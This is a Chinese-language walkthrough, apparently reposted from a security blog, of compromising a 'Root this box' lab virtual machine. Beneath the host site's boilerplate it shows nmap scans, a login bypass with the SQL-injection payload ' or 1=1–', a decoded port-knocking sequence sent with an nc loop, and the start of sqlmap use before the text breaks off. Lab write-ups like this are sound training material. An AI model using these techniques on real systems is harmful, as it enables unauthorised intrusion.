- 1、本文档共11页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
渗透测试的艺术Rootthisbox第二部曲
渗透测试的艺术:Root this box第二部曲
HYPERLINK "/author/secroro" \o "由 secroro 发布" secroro @ HYPERLINK "/articles/web" \o "查看 WEB安全 中的全部文章" WEB安全 2014-02-10 共 17654 人围观,发现 28 个不明物体 +8 HYPERLINK "/articles/web/24733.html?wpfpaction=add&postid=24733" \o "收藏该文" 收藏该文
以下为我个人整理并验证测试,谨以此文纪念我的web安全学习之路。
一、评估阶段
服务/版本
Nmap扫描显示开放了2个端口,80/TCP端口的web服务以及666/TCP端口的服务(filtered)。
刚安装的虚拟机,不知道ip,扫一下:
root@bt:~#?nmap?-sT?-p80?192.168.202.*|grep?-C?3?open
Nmap?scan?report?for?65
Host?is?up?(0.00049s?latency).
PORT???STATESERVICE
80/tcp?open??http
MAC?Address:?00:0C:29:F6:34:D4?(VMware)
Nmap?scan?report?for?54
扫到ip后,继续看看有无开放其他端口:
root@bt:~#?nmap?-sS?65
Starting?Nmap?6.25?(??)?at?2014-01-2619:16?HKT
Nmap?scan?report?for?65
Host?is?up?(0.00031s?latency).
Not?shown:?998?closed?ports
PORT????STATE????SERVICE
80/tcp??open?????http
666/tcp?filtered?doom
MAC?Address:?00:0C:29:F6:34:D4?(VMware)
Nmap?done:?1?IP?address?(1?host?up)?scanned?in?0.13?seconds
web服务
让我们分析一下80/ TCP端口有什么。打开浏览器指向目标的ip,如图:
用dirbuster(填好地址,选择dirbuster自带的字典即可)可以发现phpmyadmin的存在:
二、漏洞利用阶段
突破第一个漏洞点
只有一个登陆界面,先从它入手吧。尝试过w3af及sqlmap没有发现SQL注入。采用burpsuite里intruder模块对密码字段进行 SQL注入的Fuzzing(配置好代理后,输入账号密码admin,admin,断在burpsuite里之后,右键发送到intruder,设置好要 爆破的参数,然后加载字典,可以从burpsuite pro里直接复制过来的):
其中password为' or 1=1–'时,回应如下:
找出port-knocking组合
把那段内容拿去url解码,然后ASCII转换(/tools/xlate/),结果为:
<--------->
Knock?Knock?Knockin'?on?heaven's?door?..?:)00110000001100010011101000110001?0011000100110001?0011000000110001001110100011000000110001
<--------->
后面那段继续转换,结果为:
1001:1101:1011:1001
破开端口666/TCP
组合是:1001:1101:1011:1001。我们猜测这是打开端口666/TCP的Port-Knocking钥匙,这是一些的TCP端口。拿出nc,或者bt5下直接输入:
#?for?i?in?1001?1101?1011?1001;?do?nc?-z65?$i;?done
也就相当于一个小函数,分别用TCP发SYN包去连接该ip的这4个端口(按顺序)(很有意思,类似于芝麻敲门,一般可用于防22端口爆破)。
运行完成后,我们打开浏览器,输入ip:65:666,回车,则进入另一个界面:
突破第二个漏洞点
观察页面时,发现左边的Main Menu下有个特别长的链接,地址为:
65:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3
丢进sqlmap,dump下来mys
文档评论(0)